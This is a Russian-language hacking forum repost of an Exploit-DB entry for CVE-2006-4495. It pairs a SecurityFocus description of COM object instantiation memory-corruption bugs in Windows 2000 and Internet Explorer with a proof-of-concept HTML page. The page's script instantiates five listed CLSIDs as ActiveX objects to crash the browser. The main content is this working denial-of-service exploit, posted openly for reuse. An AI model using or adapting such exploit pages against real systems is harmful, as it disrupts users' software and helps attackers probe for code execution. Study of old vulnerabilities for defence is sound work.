Exploit Microsoft Windows Server 2000 - Multiple COM Object Instantiation Code Execution Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
28420
Проверка EDB
  1. Пройдено
Автор
NOP
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2006-4495
Дата публикации
2006-08-21
HTML:
source: https://www.securityfocus.com/bid/19636/info

Microsoft Windows 2000 is prone to multiple memory-corruption vulnerabilities that are related to the instantiation of COM objects. These issues may be remotely triggered through Internet Explorer.

The vulnerabilities arise because of the way Internet Explorer tries to instantiate certain COM objects as ActiveX controls. This may result in arbitrary code execution, but this has not been confirmed. The affected objects are not likely intended to be instantiated through Internet Explorer.

This BID may be related to the issues discussed in BID 17453 (Microsoft Internet Explorer COM Object Instantiation Code Execution Vulnerability). However, these issues affect a different set of COM objects that were not addressed in previous BIDs.

<!-- // Windows 2000 Multiple COM Object Instantiation Vulnerability // tested on Windows 2000 SP4 CN // http://www.xsec.org // nop (nop#xsec.org) --> <html> <head> <title>COM-tester</title> </head> </body> <script> var i =0; var clsid = new Array( // NO: 1 // CLSID: {3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D} // Info: Microsoft Index Server Catalog Administration Object // ProgID: Microsoft.ISCatAdm.1 // InprocServer32: C:\WINNT\system32\ciodm.dll "{3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}", // NO: 2 // CLSID: {4682C82A-B2FF-11D0-95A8-00A0C92B77A9} // Info: MyInfo ASP Component// ProgID: MSWC.MyInfo.1 // InprocServer32: C:\WINNT\system32\inetsrv\MyInfo.dll "{4682C82A-B2FF-11D0-95A8-00A0C92B77A9}", // NO: 3 // CLSID: {8E71888A-423F-11D2-876E-00A0C9082467} // Info: RadioServer Class // ProgID: Mmedia.RadioServer.1 // InprocServer32: C:\WINNT\system32\msdxm.ocx "{8E71888A-423F-11D2-876E-00A0C9082467}", // NO: 4 media player? // CLSID: {606EF130-9852-11D3-97C6-0060084856D4} // Info: CdCreator Class// ProgID: Creator.CdCreator.1 // InprocServer32: C:\Program Files\Common Files\Adaptec Shared\CreatorAPI\creator.dll "{606EF130-9852-11D3-97C6-0060084856D4}", // NO: 5 media player? // CLSID: {F849164D-9863-11D3-97C6-0060084856D4} // Info: CdDevice Class// ProgID: Creator.CdDevice.1 // InprocServer32: C:\Program Files\Common Files\Adaptec Shared\CreatorAPI\creator.dll "{F849164D-9863-11D3-97C6-0060084856D4}", // END null ); while(clsid[i]) { var a = document.createElement("object"); window.status = "Testing Object " + clsid[i] + "..."; a.setAttribute("classid", "clsid:" + clsid[i]); i++; } window.status = "failed!"; </script> </body> </html>
 
Источник
www.exploit-db.com

Похожие темы